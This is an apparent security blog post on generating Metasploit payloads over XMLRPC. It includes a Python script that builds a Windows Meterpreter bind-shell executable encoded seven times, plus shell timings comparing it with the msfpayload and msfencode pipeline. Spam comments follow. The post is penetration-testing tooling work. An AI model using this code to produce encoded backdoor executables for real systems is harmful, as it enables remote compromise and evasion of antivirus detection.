Happy Packet Blog: Fun with Metasploit payload generation

Tonight has been fun, I have been learning more about how payloads are generated inside Metasploit. My goal was to figure out how to add the msfencode functionality into the generate_simple function that is used by both XMLRPC and the console so that you can encode payloads and all that fun stuff from within Metasploit. I think I have it working now, and once Metasploit is loaded there seems to be a significant speed difference. Here is what I found:

I wrote a quick xmlrpc test to get an executable payload from Metasploit encoding it 7 times with whatever encoder it thinks is best. The code I'm using hasn't been committed or submitted yet, but if you want to test it I can provide you a patch until I'm happy enough with it to submit it.

import xmlrpclib
import binascii
proxy = xmlrpclib.ServerProxy("http://localhost:55553")

ret = proxy.auth.login("msf","abc123")
if ret['result'] == 'success':
token = ret['token']
else:
print "Could not login\n"

opts = {
"Format" : 'exe',
"Iterations" : 7,
"ForceEncode" : True}

ret = proxy.module.execute(token,"payload","windows/meterpreter/bind_tcp",opts)
if(ret['result'] == 'success'):
print binascii.unhexlify(ret['payload'])

Next.. I decided to do a test of the xmlrpc vs the traditional way of doing it:

[email protected]:~/msfmods/py# time (python get_payload.py > /tmp/test3)

real 0m3.839s
user 0m0.020s
sys 0m0.043s
[email protected]:~/msfmods/py# time (~/metasploit/msfpayload windows/meterpreter/bind_tcp raw | ~/metasploit/msfencode -t exe -c 5 -o /tmp/test2 2>/dev/null )

real 0m10.548s
user 0m7.553s
sys 0m2.920s
[email protected]:~/msfmods/py# file /tmp/test2 /tmp/test3
/tmp/test2: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit
/tmp/test3: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit

It definitely appears we have a speed increase, and with the additional overhead of an auth in the way, it's possible to take a little bit more time off of it. Being able to do this over XMLRPC hopefully will give a good way for folks to grab payloads remotely and easily for common tasks.

Have thoughts or suggestions ?

Hit me up at sussurro [aT] happypacket DOT net

5 comments:

Unknown said...: it awesome artical.i found it so educational.; December 25, 2010 at 1:00 AM
mary Brown said...: Great Article
Information Security Projects for CSE Students
Project Centers in Chennai

JavaScript Training in Chennai
JavaScript Training in Chennai; December 12, 2018 at 10:45 PM
Eva E. Murphy said...: I think, my friend has shared this post by mistake because I asked him to find someone who can Do My Dissertation Uk
format and I do not know why he has shared this post with me but I must say, you have posted very nice information which can be beneficial for many students.; November 1, 2021 at 3:11 AM
William Woodruff said...: My last week was spent learning how to generate payloads inside Metasploit, but still, I had some questions, and I was looking for their answers. After reading your blog, I identified an error that caused me to fail. British Writings; April 28, 2022 at 12:42 AM
lido said...: شركة مكافحة حشرات; May 3, 2022 at 4:30 PM

Blog.HappyPacket.net

Security Notes, News, and Thoughts

Fun with Metasploit payload generation

5 comments:

Labels

Blog Archive

Blogroll